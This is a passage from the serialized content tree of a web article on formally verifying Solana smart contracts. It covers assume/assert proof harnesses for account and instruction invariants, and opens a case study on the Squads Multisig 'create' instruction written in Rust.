89],[25836],{"type":25,"tag":216,"props":25837,"children":25839},{"className":25838},[246,2189],[25840,25845,25850,25859,25864,25873,25882,25887,25892,25897,25902],{"type":25,"tag":216,"props":25841,"children":25843},{"className":25842},[246,2151,2189],[25844],{"type":31,"value":162},{"type":25,"tag":216,"props":25846,"children":25848},{"className":25847},[246,2151,2189],[25849],{"type":31,"value":25631},{"type":25,"tag":216,"props":25851,"children":25853},{"className":25852},[257,2189],[25854],{"type":25,"tag":216,"props":25855,"children":25857},{"className":25856},[2189],[25858],{"type":31,"value":25641},{"type":25,"tag":216,"props":25860,"children":25862},{"className":25861},[263,2189],[25863],{"type":31,"value":25647},{"type":25,"tag":216,"props":25865,"children":25867},{"className":25866},[257,2189],[25868],{"type":25,"tag":216,"props":25869,"children":25871},{"className":25870},[2189],[25872],{"type":31,"value":25641},{"type":25,"tag":216,"props":25874,"children":25876},{"className":25875},[246,31,2189],[25877],{"type":25,"tag":216,"props":25878,"children":25880},{"className":25879},[246,2189],[25881],{"type":31,"value":25489},{"type":25,"tag":216,"props":25883,"children":25885},{"className":25884},[287,2189],[25886],{"type":31,"value":1850},{"type":25,"tag":216,"props":25888,"children":25890},{"className":25889},[246,2151,2189],[25891],{"type":31,"value":2254},{"type":25,"tag":216,"props":25893,"children":25895},{"className":25894},[246,2151,2189],[25896],{"type":31,"value":2934},{"type":25,"tag":216,"props":25898,"children":25900},{"className":25899},[246,2151,2189],[25901],{"type":31,"value":2541},{"type":25,"tag":216,"props":25903,"children":25905},{"className":25904},[427,2189],[25906],{"type":31,"value":1888},{"type":25,"tag":216,"props":25908,"children":25910},{"className":25909},[408],[25911],{"type":31,"value":411},{"type":25,"tag":216,"props":25913,"children":25915},{"className":25914},[304],[25916],{"type":25,"tag":216,"props":25917,"children":25919},{"className":25918,"style":25703},[309],[25920],{"type":25,"tag":216,"props":25921,"children":25922},{},[],{"type":25,"tag":216,"props":25924,"children":25926},{"className":25925,"style":1871},[257],[],{"type":25,"tag":216,"props":25928,"children":25930},{"className":25929},[246],[25931,25940,25945,25950,25955],{"type":25,"tag":216,"props":25932,"children":25934},{"className":25933},[246,31],[25935],{"type":25,"tag":216,"props":25936,"children":25938},{"className":25937},[246],[25939],{"type":31,"value":25725},{"type":25,"tag":216,"props":25941,"children":25943},{"className":25942},[287],[25944],{"type":31,"value":1850},{"type":25,"tag":216,"props":25946,"children":25948},{"className":25947},[246,2151],[25949],{"type":31,"value":162},{"type":25,"tag":216,"props":25951,"children":25953},{"className":25952},[246,2151],[25954],{"type":31,"value":25631},{"type":25,"tag":216,"props":25956,"children":25958},{"className":25957},[427],[25959],{"type":31,"value":1888},{"type":25,"tag":38,"props":25961,"children":25962},{},[25963],{"type":31,"value":25964},"Our instruction invariants are represented as:",{"type":25,"tag":2039,"props":25966,"children":25967},{},[25968,26002],{"type":25,"tag":2043,"props":25969,"children":25970},{},[25971,25996,25997],{"type":25,"tag":82,"props":25972,"children":25974},{"className":25973},[212,4702],[25975],{"type":25,"tag":216,"props":25976,"children":25978},{"className":25977},[224],[25979],{"type":25,"tag":216,"props":25980,"children":25982},{"className":25981,"ariaHidden":230},[229],[25983],{"type":25,"tag":216,"props":25984,"children":25986},{"className":25985},[235],[25987,25991],{"type":25,"tag":216,"props":25988,"children":25990},{"className":25989,"style":4799},[240],[],{"type":25,"tag":216,"props":25992,"children":25994},{"className":25993,"style":5269},[246,2151],[25995],{"type":31,"value":5272},{"type":31,"value":19288},{"type":25,"tag":82,"props":25998,"children":26000},{"className":25999},[],[26001],{"type":31,"value":24115},{"type":25,"tag":2043,"props":26003,"children":26004},{},[26005,26031,26032],{"type":25,"tag":82,"props":26006,"children":26008},{"className":26007},[212,4702],[26009],{"type":25,"tag":216,"props":26010,"children":26012},{"className":26011},[224],[26013],{"type":25,"tag":216,"props":26014,"children":26016},{"className":26015,"ariaHidden":230},[229],[26017],{"type":25,"tag":216,"props":26018,"children":26020},{"className":26019},[235],[26021,26025],{"type":25,"tag":216,"props":26022,"children":26024},{"className":26023,"style":4799},[240],[],{"type":25,"tag":216,"props":26026,"children":26028},{"className":26027,"style":5269},[246,2151],[26029],{"type":31,"value":26030},"E",{"type":31,"value":19288},{"type":25,"tag":82,"props":26033,"children":26035},{"className":26034},[],[26036],{"type":31,"value":24122},{"type":25,"tag":38,"props":26038,"children":26039},{},[26040,26042,26069,26071,26076,26078,26084],{"type":31,"value":26041},"And ",{"type":25,"tag":82,"props":26043,"children":26045},{"className":26044},[212,4702],[26046],{"type":25,"tag":216,"props":26047,"children":26049},{"className":26048},[224],[26050],{"type":25,"tag":216,"props":26051,"children":26053},{"className":26052,"ariaHidden":230},[229],[26054],{"type":25,"tag":216,"props":26055,"children":26057},{"className":26056},[235],[26058,26062],{"type":25,"tag":216,"props":26059,"children":26061},{"className":26060,"style":4799},[240],[],{"type":25,"tag":216,"props":26063,"children":26066},{"className":26064,"style":26065},[246,2151],"margin-right:0.07153em;",[26067],{"type":31,"value":26068},"K",{"type":31,"value":26070}," represents whether the instruction actually succeeds (i.e. invoking the handler returned an ",{"type":25,"tag":82,"props":26072,"children":26074},{"className":26073},[],[26075],{"type":31,"value":24449},{"type":31,"value":26077}," not an ",{"type":25,"tag":82,"props":26079,"children":26081},{"className":26080},[],[26082],{"type":31,"value":26083},"Err",{"type":31,"value":24702},{"type":25,"tag":38,"props":26086,"children":26087},{},[26088],{"type":31,"value":26089},"In order to verify these conditions we need to verify three cases:",{"type":25,"tag":606,"props":26091,"children":26093},{"id":26092},"account-invariants-1",[26094],{"type":31,"value":26095},"Account invariants",{"type":25,"tag":38,"props":26097,"children":26098},{},[26099,26101,26132,26134,26164,26166,26196],{"type":31,"value":26100},"After we execute an instruction, either the function should error and be reverted (",{"type":25,"tag":82,"props":26102,"children":26104},{"className":26103},[212,4702],[26105],{"type":25,"tag":216,"props":26106,"children":26108},{"className":26107},[224],[26109],{"type":25,"tag":216,"props":26110,"children":26112},{"className":26111,"ariaHidden":230},[229],[26113],{"type":25,"tag":216,"props":26114,"children":26116},{"className":26115},[235],[26117,26121,26127],{"type":25,"tag":216,"props":26118,"children":26120},{"className":26119,"style":4799},[240],[],{"type":25,"tag":216,"props":26122,"children":26124},{"className":26123},[246],[26125],{"type":31,"value":26126},"¬",{"type":25,"tag":216,"props":26128,"children":26130},{"className":26129,"style":26065},[246,2151],[26131],{"type":31,"value":26068},{"type":31,"value":26133},") or the account post-invariants should hold (",{"type":25,"tag":82,"props":26135,"children":26137},{"className":26136},[212,4702],[26138],{"type":25,"tag":216,"props":26139,"children":26141},{"className":26140},[224],[26142],{"type":25,"tag":216,"props":26143,"children":26145},{"className":26144,"ariaHidden":230},[229],[26146],{"type":25,"tag":216,"props":26147,"children":26149},{"className":26148},[235],[26150,26154,26159],{"type":25,"tag":216,"props":26151,"children":26153},{"className":26152,"style":4799},[240],[],{"type":25,"tag":216,"props":26155,"children":26157},{"className":26156,"style":2152},[246,2151],[26158],{"type":31,"value":2155},{"type":25,"tag":216,"props":26160,"children":26162},{"className":26161},[246],[26163],{"type":31,"value":184},{"type":31,"value":26165},"). Furthermore, we can assume that before executing a function, the account pre-invariants (",{"type":25,"tag":82,"props":26167,"children":26169},{"className":26168},[212,4702],[26170],{"type":25,"tag":216,"props":26171,"children":26173},{"className":26172},[224],[26174],{"type":25,"tag":216,"props":26175,"children":26177},{"className":26176,"ariaHidden":230},[229],[26178],{"type":25,"tag":216,"props":26179,"children":26181},{"className":26180},[235],[26182,26186,26191],{"type":25,"tag":216,"props":26183,"children":26185},{"className":26184,"style":4799},[240],[],{"type":25,"tag":216,"props":26187,"children":26189},{"className":26188,"style":2152},[246,2151],[26190],{"type":31,"value":2155},{"type":25,"tag":216,"props":26192,"children":26194},{"className":26193},[246],[26195],{"type":31,"value":1882},{"type":31,"value":26197},") should hold since we will verify all of the functions eventually.",{"type":25,"tag":38,"props":26199,"children":26200},{},[26201,26203],{"type":31,"value":26202},"So we are trying to prove that ",{"type":25,"tag":82,"props":26204,"children":26206},{"className":26205},[212,4702],[26207],{"type":25,"tag":216,"props":26208,"children":26210},{"className":26209},[224],[26211],{"type":25,"tag":216,"props":26212,"children":26214},{"className":26213,"ariaHidden":230},[229],[26215,26252,26284],{"type":25,"tag":216,"props":26216,"children":26218},{"className":26217},[235],[26219,26223,26228,26233,26238,26242,26248],{"type":25,"tag":216,"props":26220,"children":26222},{"className":26221,"style":5513},[240],[],{"type":25,"tag":216,"props":26224,"children":26226},{"className":26225},[287],[26227],{"type":31,"value":1850},{"type":25,"tag":216,"props":26229,"children":26231},{"className":26230,"style":2152},[246,2151],[26232],{"type":31,"value":2155},{"type":25,"tag":216,"props":26234,"children":26236},{"className":26235},[246],[26237],{"type":31,"value":1882},{"type":25,"tag":216,"props":26239,"children":26241},{"className":26240,"style":335},[257],[],{"type":25,"tag":216,"props":26243,"children":26245},{"className":26244},[340],[26246],{"type":31,"value":26247},"∧",{"type":25,"tag":216,"props":26249,"children":26251},{"className":26250,"style":335},[257],[],{"type":25,"tag":216,"props":26253,"children":26255},{"className":26254},[235],[26256,26260,26265,26270,26274,26280],{"type":25,"tag":216,"props":26257,"children":26259},{"className":26258,"style":5513},[240],[],{"type":25,"tag":216,"props":26261,"children":26263},{"className":26262,"style":26065},[246,2151],[26264],{"type":31,"value":26068},{"type":25,"tag":216,"props":26266,"children":26268},{"className":26267},[427],[26269],{"type":31,"value":1888},{"type":25,"tag":216,"props":26271,"children":26273},{"className":26272,"style":258},[257],[],{"type":25,"tag":216,"props":26275,"children":26277},{"className":26276},[263],[26278],{"type":31,"value":26279},"→",{"type":25,"tag":216,"props":26281,"children":26283},{"className":26282,"style":258},[257],[],{"type":25,"tag":216,"props":26285,"children":26287},{"className":26286},[235],[26288,26292,26297],{"type":25,"tag":216,"props":26289,"children":26291},{"className":26290,"style":4799},[240],[],{"type":25,"tag":216,"props":26293,"children":26295},{"className":26294,"style":2152},[246,2151],[26296],{"type":31,"value":2155},{"type":25,"tag":216,"props":26298,"children":26300},{"className":26299},[246],[26301],{"type":31,"value":184},{"type":25,"tag":38,"props":26303,"children":26304},{},[26305],{"type":31,"value":26306},"We can construct a proof harness like the following:",{"type":25,"tag":206,"props":26308,"children":26310},{"code":26309,"language":23420,"meta":7,"className":23421,"style":7},"assume(P0)\nres = instruction_handler(...)\nassert(!K || P1)\n",[26311],{"type":25,"tag":82,"props":26312,"children":26313},{"__ignoreMap":7},[26314,26322,26339],{"type":25,"tag":216,"props":26315,"children":26316},{"class":6922,"line":6923},[26317],{"type":25,"tag":216,"props":26318,"children":26319},{"style":6964},[26320],{"type":31,"value":26321},"assume(P0)\n",{"type":25,"tag":216,"props":26323,"children":26324},{"class":6922,"line":6769},[26325,26330,26334],{"type":25,"tag":216,"props":26326,"children":26327},{"style":6964},[26328],{"type":31,"value":26329},"res ",{"type":25,"tag":216,"props":26331,"children":26332},{"style":6953},[26333],{"type":31,"value":266},{"type":25,"tag":216,"props":26335,"children":26336},{"style":6964},[26337],{"type":31,"value":26338}," instruction_handler(...)\n",{"type":25,"tag":216,"props":26340,"children":26341},{"class":6922,"line":6778},[26342,26346,26350,26355,26360,26365],{"type":25,"tag":216,"props":26343,"children":26344},{"style":6973},[26345],{"type":31,"value":23944},{"type":25,"tag":216,"props":26347,"children":26348},{"style":6964},[26349],{"type":31,"value":1850},{"type":25,"tag":216,"props":26351,"children":26353},{"style":26352},"--shiki-default:#F44747",[26354],{"type":31,"value":24581},{"type":25,"tag":216,"props":26356,"children":26357},{"style":6964},[26358],{"type":31,"value":26359},"K ",{"type":25,"tag":216,"props":26361,"children":26362},{"style":26352},[26363],{"type":31,"value":26364},"||",{"type":25,"tag":216,"props":26366,"children":26367},{"style":6964},[26368],{"type":31,"value":26369}," P1)\n",{"type":25,"tag":38,"props":26371,"children":26372},{},[26373],{"type":31,"value":26374},"By itself, this harness doesn't actually prove much. For example, if the instruction fails every time, this proof will still work. However, in conjunction with the two subsequent proofs we can be assured that the instruction will actually succeed when we expect it to.",{"type":25,"tag":606,"props":26376,"children":26378},{"id":26377},"positive-instruction-invariant",[26379],{"type":31,"value":26380},"Positive instruction invariant",{"type":25,"tag":38,"props":26382,"children":26383},{},[26384,26386,26392,26394,26445],{"type":31,"value":26385},"Next we need to prove that ",{"type":25,"tag":82,"props":26387,"children":26389},{"className":26388},[],[26390],{"type":31,"value":26391},"success_if",{"type":31,"value":26393}," is a sufficient condition for instruction success. I.e. ",{"type":25,"tag":82,"props":26395,"children":26397},{"className":26396},[212,4702],[26398],{"type":25,"tag":216,"props":26399,"children":26401},{"className":26400},[224],[26402],{"type":25,"tag":216,"props":26403,"children":26405},{"className":26404,"ariaHidden":230},[229],[26406,26432],{"type":25,"tag":216,"props":26407,"children":26409},{"className":26408},[235],[26410,26414,26419,26423,26428],{"type":25,"tag":216,"props":26411,"children":26413},{"className":26412,"style":4799},[240],[],{"type":25,"tag":216,"props":26415,"children":26417},{"className":26416,"style":5269},[246,2151],[26418],{"type":31,"value":5272},{"type":25,"tag":216,"props":26420,"children":26422},{"className":26421,"style":258},[257],[],{"type":25,"tag":216,"props":26424,"children":26426},{"className":26425},[263],[26427],{"type":31,"value":26279},{"type":25,"tag":216,"props":26429,"children":26431},{"className":26430,"style":258},[257],[],{"type":25,"tag":216,"props":26433,"children":26435},{"className":26434},[235],[26436,26440],{"type":25,"tag":216,"props":26437,"children":26439},{"className":26438,"style":4799},[240],[],{"type":25,"tag":216,"props":26441,"children":26443},{"className":26442,"style":26065},[246,2151],[26444],{"type":31,"value":26068},{"type":31,"value":179},{"type":25,"tag":38,"props":26447,"children":26448},{},[26449],{"type":31,"value":26450},"Just like before we can construct a proof harness:",{"type":25,"tag":206,"props":26452,"children":26454},{"code":26453,"language":23420,"meta":7,"className":23421,"style":7},"assume(S)\nres = instruction_handler(...)\nassert(K)\n",[26455],{"type":25,"tag":82,"props":26456,"children":26457},{"__ignoreMap":7},[26458,26466,26481],{"type":25,"tag":216,"props":26459,"children":26460},{"class":6922,"line":6923},[26461],{"type":25,"tag":216,"props":26462,"children":26463},{"style":6964},[26464],{"type":31,"value":26465},"assume(S)\n",{"type":25,"tag":216,"props":26467,"children":26468},{"class":6922,"line":6769},[26469,26473,26477],{"type":25,"tag":216,"props":26470,"children":26471},{"style":6964},[26472],{"type":31,"value":26329},{"type":25,"tag":216,"props":26474,"children":26475},{"style":6953},[26476],{"type":31,"value":266},{"type":25,"tag":216,"props":26478,"children":26479},{"style":6964},[26480],{"type":31,"value":26338},{"type":25,"tag":216,"props":26482,"children":26483},{"class":6922,"line":6778},[26484,26488],{"type":25,"tag":216,"props":26485,"children":26486},{"style":6973},[26487],{"type":31,"value":23944},{"type":25,"tag":216,"props":26489,"children":26490},{"style":6964},[26491],{"type":31,"value":26492},"(K)\n",{"type":25,"tag":38,"props":26494,"children":26495},{},[26496,26498,26503,26505,26517],{"type":31,"value":26497},"This proof assures that whenever ",{"type":25,"tag":82,"props":26499,"children":26501},{"className":26500},[],[26502],{"type":31,"value":24115},{"type":31,"value":26504}," is satisfied, the instruction will succeed. However, remember that since this is not a biconditional, the instruction may also succeed ",{"type":25,"tag":64,"props":26506,"children":26507},{},[26508,26510,26515],{"type":31,"value":26509},"even if ",{"type":25,"tag":82,"props":26511,"children":26513},{"className":26512},[],[26514],{"type":31,"value":24115},{"type":31,"value":26516}," is not satisfied",{"type":31,"value":26518},". To specify explicit error conditions we need our third and final proof.",{"type":25,"tag":606,"props":26520,"children":26522},{"id":26521},"_3-negative-instruction-invariant",[26523],{"type":31,"value":26524},"3. Negative instruction invariant",{"type":25,"tag":38,"props":26526,"children":26527},{},[26528,26530,26535,26537,26593],{"type":31,"value":26529},"Finally, we want to prove that ",{"type":25,"tag":82,"props":26531,"children":26533},{"className":26532},[],[26534],{"type":31,"value":24122},{"type":31,"value":26536}," is a sufficient condition for instruction failure. I.e. ",{"type":25,"tag":82,"props":26538,"children":26540},{"className":26539},[212,4702],[26541],{"type":25,"tag":216,"props":26542,"children":26544},{"className":26543},[224],[26545],{"type":25,"tag":216,"props":26546,"children":26548},{"className":26547,"ariaHidden":230},[229],[26549,26575],{"type":25,"tag":216,"props":26550,"children":26552},{"className":26551},[235],[26553,26557,26562,26566,26571],{"type":25,"tag":216,"props":26554,"children":26556},{"className":26555,"style":4799},[240],[],{"type":25,"tag":216,"props":26558,"children":26560},{"className":26559,"style":5269},[246,2151],[26561],{"type":31,"value":26030},{"type":25,"tag":216,"props":26563,"children":26565},{"className":26564,"style":258},[257],[],{"type":25,"tag":216,"props":26567,"children":26569},{"className":26568},[263],[26570],{"type":31,"value":26279},{"type":25,"tag":216,"props":26572,"children":26574},{"className":26573,"style":258},[257],[],{"type":25,"tag":216,"props":26576,"children":26578},{"className":26577},[235],[26579,26583,26588],{"type":25,"tag":216,"props":26580,"children":26582},{"className":26581,"style":4799},[240],[],{"type":25,"tag":216,"props":26584,"children":26586},{"className":26585},[246],[26587],{"type":31,"value":26126},{"type":25,"tag":216,"props":26589,"children":26591},{"className":26590,"style":26065},[246,2151],[26592],{"type":31,"value":26068},{"type":31,"value":179},{"type":25,"tag":38,"props":26595,"children":26596},{},[26597],{"type":31,"value":26598},"This harness looks just like the previous one:",{"type":25,"tag":206,"props":26600,"children":26602},{"code":26601,"language":23420,"meta":7,"className":23421,"style":7},"assume(E)\nres = instruction_handler(...)\nassert(!K)\n",[26603],{"type":25,"tag":82,"props":26604,"children":26605},{"__ignoreMap":7},[26606,26614,26629],{"type":25,"tag":216,"props":26607,"children":26608},{"class":6922,"line":6923},[26609],{"type":25,"tag":216,"props":26610,"children":26611},{"style":6964},[26612],{"type":31,"value":26613},"assume(E)\n",{"type":25,"tag":216,"props":26615,"children":26616},{"class":6922,"line":6769},[26617,26621,26625],{"type":25,"tag":216,"props":26618,"children":26619},{"style":6964},[26620],{"type":31,"value":26329},{"type":25,"tag":216,"props":26622,"children":26623},{"style":6953},[26624],{"type":31,"value":266},{"type":25,"tag":216,"props":26626,"children":26627},{"style":6964},[26628],{"type":31,"value":26338},{"type":25,"tag":216,"props":26630,"children":26631},{"class":6922,"line":6778},[26632,26636,26640,26644],{"type":25,"tag":216,"props":26633,"children":26634},{"style":6973},[26635],{"type":31,"value":23944},{"type":25,"tag":216,"props":26637,"children":26638},{"style":6964},[26639],{"type":31,"value":1850},{"type":25,"tag":216,"props":26641,"children":26642},{"style":26352},[26643],{"type":31,"value":24581},{"type":25,"tag":216,"props":26645,"children":26646},{"style":6964},[26647],{"type":31,"value":26648},"K)\n",{"type":25,"tag":38,"props":26650,"children":26651},{},[26652,26654,26658],{"type":31,"value":26653},"With these three harnesses, we are now able to formally verify that instructions succeed or fail when we expect them to ",{"type":25,"tag":64,"props":26655,"children":26656},{},[26657],{"type":31,"value":20330},{"type":31,"value":26659}," the account invariants we expect are always being preserved.",{"type":25,"tag":26,"props":26661,"children":26663},{"id":26662},"case-study-squads-multisig",[26664],{"type":31,"value":26665},"Case study: Squads Multisig",{"type":25,"tag":38,"props":26667,"children":26668},{},[26669,26671,26676],{"type":31,"value":26670},"During our research, we focused on formally verifying aspects of the ",{"type":25,"tag":162,"props":26672,"children":26674},{"href":22784,"rel":26673},[166],[26675],{"type":31,"value":22788},{"type":31,"value":179},{"type":25,"tag":38,"props":26678,"children":26679},{},[26680,26682,26688,26690,26696],{"type":31,"value":26681},"The program defines a Multisig account (",{"type":25,"tag":82,"props":26683,"children":26685},{"className":26684},[],[26686],{"type":31,"value":26687},"Ms",{"type":31,"value":26689},") which has multiple members. These members can propose and then vote on transactions to execute on behalf of the multisig. If at least some ",{"type":25,"tag":82,"props":26691,"children":26693},{"className":26692},[],[26694],{"type":31,"value":26695},"threshold",{"type":31,"value":26697}," of members vote yes, the transaction will be invoked. Additionally, there is functionality to add/remove users and update the threshold.",{"type":25,"tag":38,"props":26699,"children":26700},{},[26701],{"type":31,"value":26702},"In practice, this structure provides a useful way to distribute authority across a group of individuals. From a formal verification perspective, it has both stateless and stateful features and constraints that provided a good testbed for our tooling.",{"type":25,"tag":38,"props":26704,"children":26705},{},[26706],{"type":31,"value":26707},"In this section we will go through a few examples of properties that we can verify on this program:",{"type":25,"tag":6711,"props":26709,"children":26710},{},[26711,26716,26721,26726],{"type":25,"tag":2043,"props":26712,"children":26713},{},[26714],{"type":31,"value":26715},"Incrementally verifying minimum requirements to create a multisig",{"type":25,"tag":2043,"props":26717,"children":26718},{},[26719],{"type":31,"value":26720},"Verify threshold requirements",{"type":25,"tag":2043,"props":26722,"children":26723},{},[26724],{"type":31,"value":26725},"Verify requirements to remove a member",{"type":25,"tag":2043,"props":26727,"children":26728},{},[26729],{"type":31,"value":26730},"Safety guarantees",{"type":25,"tag":606,"props":26732,"children":26734},{"id":26733},"_1-incrementally-verifying-minimum-requirements-to-create-a-multisig",[26735],{"type":31,"value":26736},"1. Incrementally verifying minimum requirements to create a multisig",{"type":25,"tag":38,"props":26738,"children":26739},{},[26740,26742,26747],{"type":31,"value":26741},"Suppose we want to verify the minimum requirements to create a multisig, i.e. the ",{"type":25,"tag":82,"props":26743,"children":26745},{"className":26744},[],[26746],{"type":31,"value":24115},{"type":31,"value":26748}," expression.",{"type":25,"tag":38,"props":26750,"children":26751},{},[26752,26754,26759,26761,26767],{"type":31,"value":26753},"Creating a multisig (",{"type":25,"tag":82,"props":26755,"children":26757},{"className":26756},[],[26758],{"type":31,"value":26687},{"type":31,"value":26760},") requires invoking the ",{"type":25,"tag":82,"props":26762,"children":26764},{"className":26763},[],[26765],{"type":31,"value":26766},"create",{"type":31,"value":26768}," instruction:",{"type":25,"tag":206,"props":26770,"children":26772},{"code":26771,"language":6914,"meta":7,"className":6915,"style":7},"#[derive(Accounts)]\n#[instruction(threshold: u16, create_key: Pubkey, members: Vec\u003CPubkey>)]\npub struct Create\u003C'info> {\n    #[account(\n        init,\n        payer = creator,\n        space = Ms::SIZE_WITHOUT_MEMBERS + (members.len() * 32),\n        seeds = [b\"squad\", create_key.as_ref(), b\"multisig\"], bump\n    )]\n    pub multisig: Account\u003C'info, Ms>,\n\n    #[account(mut)]\n    pub creator: Signer\u003C'info>,\n    pub system_program: Program\u003C'info, System>,\n}\n\npub fn create(\n    ctx: Context\u003CCreate>,\n    threshold: u16,\n    create_key: Pubkey,\n    members: Vec\u003CPubkey>,\n) -> Result\u003C()> {\n    // sort the members and remove duplicates\n    let mut members = members;\n    members.sort();\n    members.dedup();\n\n    // check we don't exceed u16\n    let total_members = members.len();\n    if total_members \u003C 1 {\n        return err!(MsError::EmptyMembers);\n    }\n\n    // make sure we don't exceed u16 on first call\n    if total_members > usize::from(u16::MAX) {\n        return err!(MsError::MaxMembersReached);\n    }\n\n    // make sure threshold is valid\n    if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n        return err!(MsError::InvalidThreshold);\n    }\n\n    ctx.accounts.multisig.init(\n        threshold,\n        create_key,\n        members,\n        *ctx.bumps.get(\"multisig\").unwrap(),\n    )\n}\n",[26773],{"type":25,"tag":82,"props":26774,"children":26775},{"__ignoreMap":7},[26776,26793,26848,26878,26886,26894,26911,26962,27012,27020,27061,27068,27084,27117,27159,27166,27173,27192,27220,27240,27260,27288,27307,27315,27343,27363,27383,27390,27398,27430,27453,27488,27496,27504,27513,27555,27588,27596,27604,27613,27689,27722,27730,27738,27775,27788,27801,27814,27868,27877],{"type":25,"tag":216,"props":26777,"children":26778},{"class":6922,"line":6923},[26779,26784,26789],{"type":25,"tag":216,"props":26780,"children":26781},{"style":6964},[26782],{"type":31,"value":26783},"#[derive(",{"type":25,"tag":216,"props":26785,"children":26786},{"style":7375},[26787],{"type":31,"value":26788},"Accounts",{"type":25,"tag":216,"props":26790,"children":26791},{"style":6964},[26792],{"type":31,"value":24218},{"type":25,"tag":216,"props":26794,"children":26795},{"class":6922,"line":6769},[26796,26801,26805,26809,26814,26818,26822,26827,26831,26835,26839,26843],{"type":25,"tag":216,"props":26797,"children":26798},{"style":6964},[26799],{"type":31,"value":26800},"#[instruction(threshold",{"type":25,"tag":216,"props":26802,"children":26803},{"style":6953},[26804],{"type":31,"value":1472},{"type":25,"tag":216,"props":26806,"children":26807},{"style":7375},[26808],{"type":31,"value":24990},{"type":25,"tag":216,"props":26810,"children":26811},{"style":6964},[26812],{"type":31,"value":26813},", create_key",{"type":25,"tag":216,"props":26815,"children":26816},{"style":6953},[26817],{"type":31,"value":1472},{"type":25,"tag":216,"props":26819,"children":26820},{"style":7375},[26821],{"type":31,"value":24817},{"type":25,"tag":216,"props":26823,"children":26824},{"style":6964},[26825],{"type":31,"value":26826},", members",{"type":25,"tag":216,"props":26828,"children":26829},{"style":6953},[26830],{"type":31,"value":1472},{"type":25,"tag":216,"props":26832,"children":26833},{"style":7375},[26834],{"type":31,"value":25349},{"type":25,"tag":216,"props":26836,"children":26837},{"style":6964},[26838],{"type":31,"value":9757},{"type":25,"tag":216,"props":26840,"children":26841},{"style":7375},[26842],{"type":31,"value":25358},{"type":25,"tag":216,"props":26844,"children":26845},{"style":6964},[26846],{"type":31,"value":26847},">)]\n",{"type":25,"tag":216,"props":26849,"children":26850},{"class":6922,"line":6778},[26851,26855,26859,26864,26869,26874],{"type":25,"tag":216,"props":26852,"children":26853},{"style":6936},[26854],{"type":31,"value":17647},{"type":25,"tag":216,"props":26856,"children":26857},{"style":6936},[26858],{"type":31,"value":25111},{"type":25,"tag":216,"props":26860,"children":26861},{"style":7375},[26862],{"type":31,"value":26863}," Create",{"type":25,"tag":216,"props":26865,"children":26866},{"style":6964},[26867],{"type":31,"value":26868},"\u003C'",{"type":25,"tag":216,"props":26870,"children":26871},{"style":7375},[26872],{"type":31,"value":26873},"info",{"type":25,"tag":216,"props":26875,"children":26876},{"style":6964},[26877],{"type":31,"value":11233},{"type":25,"tag":216,"props":26879,"children":26880},{"class":6922,"line":7005},[26881],{"type":25,"tag":216,"props":26882,"children":26883},{"style":6964},[26884],{"type":31,"value":26885},"    #[account(\n",{"type":25,"tag":216,"props":26887,"children":26888},{"class":6922,"line":7110},[26889],{"type":25,"tag":216,"props":26890,"children":26891},{"style":6964},[26892],{"type":31,"value":26893},"        init,\n",{"type":25,"tag":216,"props":26895,"children":26896},{"class":6922,"line":7216},[26897,26902,26906],{"type":25,"tag":216,"props":26898,"children":26899},{"style":6964},[26900],{"type":31,"value":26901},"        payer ",{"type":25,"tag":216,"props":26903,"children":26904},{"style":6953},[26905],{"type":31,"value":266},{"type":25,"tag":216,"props":26907,"children":26908},{"style":6964},[26909],{"type":31,"value":26910}," creator,\n",{"type":25,"tag":216,"props":26912,"children":26913},{"class":6922,"line":7244},[26914,26919,26923,26927,26931,26936,26940,26945,26949,26953,26957],{"type":25,"tag":216,"props":26915,"children":26916},{"style":6964},[26917],{"type":31,"value":26918},"        space ",{"type":25,"tag":216,"props":26920,"children":26921},{"style":6953},[26922],{"type":31,"value":266},{"type":25,"tag":216,"props":26924,"children":26925},{"style":7375},[26926],{"type":31,"value":25116},{"type":25,"tag":216,"props":26928,"children":26929},{"style":6953},[26930],{"type":31,"value":7438},{"type":25,"tag":216,"props":26932,"children":26933},{"style":7375},[26934],{"type":31,"value":26935},"SIZE_WITHOUT_MEMBERS",{"type":25,"tag":216,"props":26937,"children":26938},{"style":6953},[26939],{"type":31,"value":12858},{"type":25,"tag":216,"props":26941,"children":26942},{"style":6964},[26943],{"type":31,"value":26944}," (members",{"type":25,"tag":216,"props":26946,"children":26947},{"style":6953},[26948],{"type":31,"value":179},{"type":25,"tag":216,"props":26950,"children":26951},{"style":6964},[26952],{"type":31,"value":24981},{"type":25,"tag":216,"props":26954,"children":26955},{"style":6953},[26956],{"type":31,"value":8519},{"type":25,"tag":216,"props":26958,"children":26959},{"style":6964},[26960],{"type":31,"value":26961}," 32),\n",{"type":25,"tag":216,"props":26963,"children":26964},{"class":6922,"line":7257},[26965,26970,26974,26979,26984,26988,26992,26997,27002,27007],{"type":25,"tag":216,"props":26966,"children":26967},{"style":6964},[26968],{"type":31,"value":26969},"        seeds ",{"type":25,"tag":216,"props":26971,"children":26972},{"style":6953},[26973],{"type":31,"value":266},{"type":25,"tag":216,"props":26975,"children":26976},{"style":6964},[26977],{"type":31,"value":26978}," [",{"type":25,"tag":216,"props":26980,"children":26981},{"style":8205},[26982],{"type":31,"value":26983},"b\"squad\"",{"type":25,"tag":216,"props":26985,"children":26986},{"style":6964},[26987],{"type":31,"value":26813},{"type":25,"tag":216,"props":26989,"children":26990},{"style":6953},[26991],{"type":31,"value":179},{"type":25,"tag":216,"props":26993,"children":26994},{"style":6964},[26995],{"type":31,"value":26996},"as_ref(), ",{"type":25,"tag":216,"props":26998,"children":26999},{"style":8205},[27000],{"type":31,"value":27001},"b\"multisig\"",{"type":25,"tag":216,"props":27003,"children":27004},{"style":6964},[27005],{"type":31,"value":27006},"], ",{"type":25,"tag":216,"props":27008,"children":27009},{"style":6947},[27010],{"type":31,"value":27011},"bump\n",{"type":25,"tag":216,"props":27013,"children":27014},{"class":6922,"line":7275},[27015],{"type":25,"tag":216,"props":27016,"children":27017},{"style":6964},[27018],{"type":31,"value":27019},"    )]\n",{"type":25,"tag":216,"props":27021,"children":27022},{"class":6922,"line":7296},[27023,27027,27032,27036,27041,27045,27049,27053,27057],{"type":25,"tag":216,"props":27024,"children":27025},{"style":6936},[27026],{"type":31,"value":24803},{"type":25,"tag":216,"props":27028,"children":27029},{"style":6947},[27030],{"type":31,"value":27031}," multisig",{"type":25,"tag":216,"props":27033,"children":27034},{"style":6953},[27035],{"type":31,"value":1472},{"type":25,"tag":216,"props":27037,"children":27038},{"style":7375},[27039],{"type":31,"value":27040}," 